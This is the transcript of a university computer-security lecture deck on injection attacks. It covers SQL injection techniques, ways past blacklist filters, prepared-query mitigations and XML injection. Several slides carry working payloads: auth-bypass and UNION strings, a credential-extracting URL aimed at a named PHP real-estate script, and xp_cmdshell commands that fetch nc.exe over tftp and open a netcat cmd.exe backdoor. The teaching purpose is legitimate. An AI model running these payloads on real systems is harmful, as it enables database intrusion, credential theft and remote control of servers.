Presentation is loading. Please wait.

Presentation is loading. Please wait.

Injection CSC 482/582: Computer SecuritySlide #1.

Published byIlene Atkinson Modified over 8 years ago

Similar presentations

Presentation on theme: "Injection CSC 482/582: Computer SecuritySlide #1."— Presentation transcript:

1 Injection CSC 482/582: Computer SecuritySlide #1

2 Topics 1. Injection Attacks 2. SQL Injection 3. Mitigating SQL Injection 4. XML Injection CSC 482/582: Computer SecuritySlide #2

3 CSC 482/582: Computer Security Injection Injection attacks trick an application into including unintended commands in the data send to an interpreter. Interpreters Interpret strings as commands. Ex: SQL, command shell, LDAP, XPath, XML, JSON Key Idea Input data from the application is executed as code by the interpreter. Slide #3

4 CSC 482/582: Computer Security SQL Injection 1. App sends form to user. 2. Attacker submits form with SQL exploit data. 3. Application builds string with exploit data. 4. Application sends SQL query to DB. 5. DB executes query, including exploit, sends data back to application. 6. Application returns data to user. Attacker Web Server DB Server Firewall User Pass ‘ or 1=1-- 4

5 CSC 482/582: Computer Security SQL Injection in PHP $link = mysql_connect($DB_HOST, $DB_USERNAME, $DB_PASSWORD) or die ("Couldn't connect: ". mysql_error()); mysql_select_db($DB_DATABASE); $query = "select count(*) from users where username = '$username' and password = '$password'"; $result = mysql_query($query); Slide #5

6 CSC 482/582: Computer Security SQL Injection Attack #1 Unauthorized Access Attempt: password = ’ or 1=1 -- SQL statement becomes: select count(*) from users where username = ‘user’ and password = ‘’ or 1=1 -- Checks if password is empty OR 1=1, which is always true, permitting access. Slide #6

7 CSC 482/582: Computer Security SQL Injection Attack #2 Database Modification Attack: password = foo’; delete from table users where username like ‘% DB executes two SQL statements: select count(*) from users where username = ‘user’ and password = ‘foo’ delete from table users where username like ‘%’ Slide #7

8 CSC 482/582: Computer Security Exploits of a Mom http://www.xkcd.com/327/ Slide #8

9 CSC 482/582: Computer Security Finding SQL Injection Bugs 1. Submit a single quote as input. If an error results, app is vulnerable. If no error, check for any output changes. 2. Submit two single quotes. Databases use ’’ to represent literal ’ If error disappears, app is vulnerable. 3. Try string or numeric operators. Oracle: ’||’FOO MS-SQL: ‘+’FOO MySQL: ’ ’FOO 2-2 81+19 49-ASCII(1) Slide #9

10 CSC 482/582: Computer Security Injecting into SELECT Most common SQL entry point. SELECT columns FROM table WHERE expression ORDER BY expression Places where user input is inserted: WHERE expression ORDER BY expression Table or column names Slide #10

11 CSC 482/582: Computer Security UNION Combines SELECT s into one result. SELECT cols FROM table WHERE expr UNION SELECT cols2 FROM table2 WHERE expr2 Allows attacker to read any table foo’ UNION SELECT number FROM cc-- Requirements Results must have same number and type of cols. Attacker needs to know name of other table. DB returns results with column names of 1 st query. Slide #11

12 CSC 482/582: Computer Security UNION Finding #columns with NULL ‘ UNION SELECT NULL-- ‘ UNION SELECT NULL, NULL-- ‘ UNION SELECT NULL, NULL, NULL-- Finding #columns with ORDER BY ‘ ORDER BY 1-- ‘ ORDER BY 2-- ‘ ORDER BY 3-- Finding a string column to extract data ‘ UNION SELECT ‘a’, NULL, NULL— ‘ UNION SELECT NULL, ‘a’, NULL-- ‘ UNION SELECT NULL, NULL, ‘a’-- Slide #12

13 CSC 482/582: Computer Security Injecting into INSERT Creates a new data row in a table. INSERT INTO table (col1, col2,...) VALUES (val1, val2,...) Requirements Number of values must match # columns. Types of values must match column types. Technique: add values until no error. foo’)-- foo’, 1)-- foo’, 1, 1)-- Slide #13

14 CSC 482/582: Computer Security Problem: What if app doesn’t print data? Injection can produce detectable behavior Successful or failed web page. Noticeable time delay or absence of delay. Identify an exploitable URL http://site/blog?message=5 AND 1=1 http://site/blog?message=5 AND 1=2 Use condition to identify one piece of data (SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) = 1 (SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) = 2... or use binary search technique... (SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) > 5 Inference Attacks Slide #14

15 CSC 482/582: Computer Security Beyond Data Retrieval Downloading Files exec master..xp_cmdshell ‘tftp 192.168.1.1 GET nc.exe c:\nc.exe’ Backdoor with Netcat exec master..xp_cmdshell ‘nc.exe -e cmd.exe -l -p 53’ Direct Backdoor w/o External Cmds UTL_TCP.OPEN_CONNECTION( '192.168.0.1', 2222, 1521) Slide #15

16 CSC 482/582: Computer Security Real Estate Site Hacking www.website.com/fullnews.php?id=- 1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(usern ame,char(58),password),4,5/**/FROM/**/admin/* Exploit against http://phprealestatescript.com/ Slide #16

17 CSC 482/582: Computer Security Impact of SQL Injection 1. Leakage of sensitive information. 2. Reputation decline. 3. Modification of sensitive information. 4. Loss of control of db server. 5. Data loss. 6. Denial of service. Slide #17

18 CSC 482/582: Computer Security The Problem: String Building Building a SQL command string with user input in any language is dangerous. Variable interpolation. String concatenation with variables. String format functions like sprintf(). String templating with variable replacement. Slide #18

19 CSC 482/582: Computer Security Mitigating SQL Injection Partially Effective Mitigations Blacklists Stored Procedures Effective Mitigations Whitelists Prepared Queries Slide #19

20 CSC 482/582: Computer Security Ineffective Mitigation: Blacklist Filter out known bad SQL metacharacters, such as single quotes. Problems: 1. Numeric parameters don’t use quotes. 2. URL escaped metacharacters. 3. Unicode encoded metacharacters. 4. Did you miss any metacharacters? Slide #20

21 CSC 482/582: Computer Security Bypassing Blacklist Filters Different case SeLecT instead of SELECT or select Bypass keyword removal filters SELSELECTECT URL-encoding %53%45%4C%45%43%54 SQL comments SELECT/*foo*/num/*foo*/FROM/**/cc SEL/*foo*/ECT String Building ‘us’||’er’ chr(117)||chr(115)||chr(101)||chr(114) Slide #21

22 CSC 482/582: Computer Security Ineffective Mitigation: Stored Procedures SQL Stored Procedures build strings too: CREATE PROCEDURE dbo.doQuery(@id nchar(128) AS DECLARE @query nchar(256) SELECT @query = ‘SELECT cc FROM cust WHERE id=‘’’ + @id + ‘’’’ EXEC @query RETURN and they can be invoked insecurely with user input: exec sp_login ‘user’ ‘foo’; master..xp_cmdshell ‘tftp e.com GET nc.exe’# Slide #22

23 CSC 482/582: Computer Security Mitigation: Whitelist Reject input that doesn’t match your list of safe characters to accept. Identify what’s good, not what’s bad. Reject input instead of attempting to repair. Still have to deal with single quotes when required, such as in names. Slide #23

24 CSC 482/582: Computer Security Mitigation: Prepared Queries require_once 'MDB2.php'; $mdb2 =& MDB2::factory($dsn, $options); if (PEAR::isError($mdb2)) { die($mdb2->getMessage()); } $sql = “SELECT count(*) from users where username = ? and password = ?”; $types = array('text', 'text'); $sth = $mdb2->prepare($sql, $types, MDB2_PREPARE_MANIP); $data = array($username, $password); $sth->execute($data); Slide #24

25 XML Injection User registration Form http://site/adduser?username=al&password=letmein&em ail=al@gmail.com XML data al letmein 101 al@gmail.com

26 XML Injection Malicious input Username: al Password: letmein 0 <!-- Email: --> al@gmail.com Result al letmein 0 101 --> al@gmail.com

27 Key Points Injection attacks insert attacker-controlled data, which is interpreted as code by an interpreter. Command injection SQL injection JSON injection XML injection XPath injection Injection attacks can be mitigated by Avoiding the interpreter (prepared queries) Whitelisting if it is impossible to avoid interpreter CSC 482/582: Computer SecuritySlide #27

28 References 1. Andreu, Professional Penetration Testing for Web Applications, Wrox, 2006. 2. Daswani et. al., Foundations of Security, Apress, 2007. 3. Friedl, SQL Injection Attacks by Example, http://unixwiz.net/techtips/sql-injection.html, 2007. http://unixwiz.net/techtips/sql-injection.html 4. IBM, IBM X-Force 2010 Mid-Year Trend and Risk Report, http://www- 935.ibm.com/services/us/iss/xforce/trendreports/, 2010.http://www- 935.ibm.com/services/us/iss/xforce/trendreports/ 5. OWASP, OWASP Top 10 for 2010, http://www.owasp.org/index.php/Category:OWA SP_Top_Ten_Project 6. Stuttart and Pinto, The Web Application Hacker’s Handbook, Wiley, 2007. CSC 482/582: Computer SecuritySlide #28

Download ppt "Injection CSC 482/582: Computer SecuritySlide #1."

Similar presentations

How Did I Steal Your Database Mostafa

How Did I Steal Your Database Mostafa
Introduction The concept of “SQL Injection”

Introduction The concept of “SQL Injection”
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba.

NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba.
James Walden, Maureen Doyle Northern Kentucky University Students: Andrew Plunkett, Rob Lenhof, John Murray.

James Walden, Maureen Doyle Northern Kentucky University Students: Andrew Plunkett, Rob Lenhof, John Murray.
07 December 2009Slide 1 of 1207 December 2009Slide 1 of 12 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.

07 December 2009Slide 1 of 1207 December 2009Slide 1 of 12 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.
Web Application Security An Introduction. OWASP Top Ten Exploits *Unvalidated Input Broken Access Control Broken Authentication and Session Management.

Web Application Security An Introduction. OWASP Top Ten Exploits *Unvalidated Input Broken Access Control Broken Authentication and Session Management.
07 December 2009Slide 1 of 9 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.

07 December 2009Slide 1 of 9 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.
SQL Injection and Buffer overflow

SQL Injection and Buffer overflow
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.

Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
Secure Software Engineering James Walden Northern Kentucky University.

Secure Software Engineering James Walden Northern Kentucky University.
Dec 13 th CS555 presentation1 Yiwen Wang --“Securing the DB may be the single biggest action an organization can take to protect its assets” David C. Knox.

Dec 13 th CS555 presentation1 Yiwen Wang --“Securing the DB may be the single biggest action an organization can take to protect its assets” David C. Knox.
SQL Injection CPSC 4670.

SQL Injection CPSC 4670.
1 IS 2150 / TEL 2810 Introduction to Security James Joshi Associate Professor, SIS Lecture 12.1 Nov 20, 2012 SQL Injection Cross-Site Scripting.

1 IS 2150 / TEL 2810 Introduction to Security James Joshi Associate Professor, SIS Lecture 12.1 Nov 20, 2012 SQL Injection Cross-Site Scripting.
SJSU CS157B Dr. Lee1  2004 Jenny Mitchell Two Useful Tools You Can’t Live Without by Jenny Mitchell SJSU CS157B Section 1 09-21-04 PHP and MySQL.

SJSU CS157B Dr. Lee1  2004 Jenny Mitchell Two Useful Tools You Can’t Live Without by Jenny Mitchell SJSU CS157B Section PHP and MySQL.
MIS 5211.001 Week 11 Site:

MIS Week 11 Site:
Analysis of SQL injection prevention using a proxy server By: David Rowe Supervisor: Barry Irwin.

Analysis of SQL injection prevention using a proxy server By: David Rowe Supervisor: Barry Irwin.
CSCI 6962: Server-side Design and Programming Secure Web Programming.

CSCI 6962: Server-side Design and Programming Secure Web Programming.
Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.

Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.
Web Application Access to Databases. Logistics Test 2: May 1 st (24 hours) Extra office hours: Friday 2:30 – 4:00 pm Tuesday May 5 th – you can review.

Web Application Access to Databases. Logistics Test 2: May 1 st (24 hours) Extra office hours: Friday 2:30 – 4:00 pm Tuesday May 5 th – you can review.

Similar presentations

Ads by Google